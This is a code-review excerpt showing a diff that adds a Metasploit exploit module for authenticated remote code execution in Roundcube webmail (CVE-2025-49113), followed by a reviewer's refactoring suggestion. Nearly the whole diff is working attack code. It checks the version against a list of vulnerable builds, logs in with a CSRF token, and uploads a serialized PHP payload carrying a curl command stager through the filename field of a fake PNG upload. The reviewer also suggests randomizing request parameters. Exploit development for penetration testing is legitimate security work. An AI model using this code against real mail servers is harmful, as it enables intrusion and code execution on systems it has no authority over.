modules/exploits/multi/http/roundcube_auth_rce_cve_2025_49113.rb

```diff
@@ -0,0 +1,180 @@
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") unless res.code == 200
+    res
+  end
+
+  def check
+    res = fetch_login_page
+
+    unless res.body =~ /"rcversion"\s*:\s*(\d+)/
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract version number")
+    end
+
+    version = Regexp.last_match(1)
+    vprint_good("Extracted version: #{version}")
+
+    vulnerable_versions = %w[
+      10500 10501 10502 10503 10504 10505 10506 10507 10508 10509
+      10600 10601 10602 10603 10604 10605 10606 10607 10608 10609 10610
+    ]
+
+    if vulnerable_versions.include?(version)
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    stager = generate_cmdstager(flavor: :curl, 'Path' => '/').join(';')
+    payload_serialized = PhpPayloadBuilder.new(stager).build.gsub('"', '\\"')
+
+    token = fetch_csrf_token
+    login(token)
+
+    print_status('Uploading malicious payload...')
+    upload_payload(payload_serialized)
+
+    print_good('Exploit attempt complete. Check for session.')
+  end
+
+  def fetch_csrf_token
+    print_status('Fetching CSRF token...')
+    res = fetch_login_page
+
+    unless res.body =~ /name="_token" value="([^"]+)"/
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract CSRF token")
+    end
+
+    token = Regexp.last_match(1)
+    vprint_good("Extracted token: #{token}")
+    token
+  end
+
+  def login(token)
+    print_status('Attempting login...')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        '_token' => token,
+        '_task' => 'login',
+        '_action' => 'login',
+        '_url' => '_task=login',
+        '_user' => datastore['USERNAME'],
+        '_pass' => datastore['PASSWORD']
+      },
+      'vars_get' => { '_task' => 'login' }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - No response during login") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Login failed (code #{res.code})") unless res.code == 302
+
+    print_good('Login successful.')
+  end
+
+  def upload_payload(payload_filename)
+    png_data = Rex::Text.decode_base64('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==')
+    boundary = Rex::Text.rand_text_alphanumeric(8)
+
+    data = ''
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"_file[]\"; filename=\"#{payload_filename}\"\r\n"
+    data << "Content-Type: image/png\r\n\r\n"
+    data << png_data
+    data << "\r\n--#{boundary}--\r\n"
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '?_task=settings&_framed=1&_remote=1&_from=edit-!xxx&_id=&_uploadid=upload123&_unlock=loading&_action=upload'),
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => data
```

Comment:
```suggestion
    vars_form_data = [{
      'name' = '_file[]'
      'filename' = payload_filename,
      'content_type' = 'image/png',
      'data' = png_data,
    }]

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '?_task=settings&_framed=1&_remote=1&_from=edit-!xxx&_id=&_uploadid=upload123&_unlock=loading&_action=upload'),
      'ctype' => "multipart/form-data; boundary=#{boundary}",
      'vars_form_data' => vars_form_data
```

Moreover, I think the `_from` and `_uploadid` variable could be randomized a bit.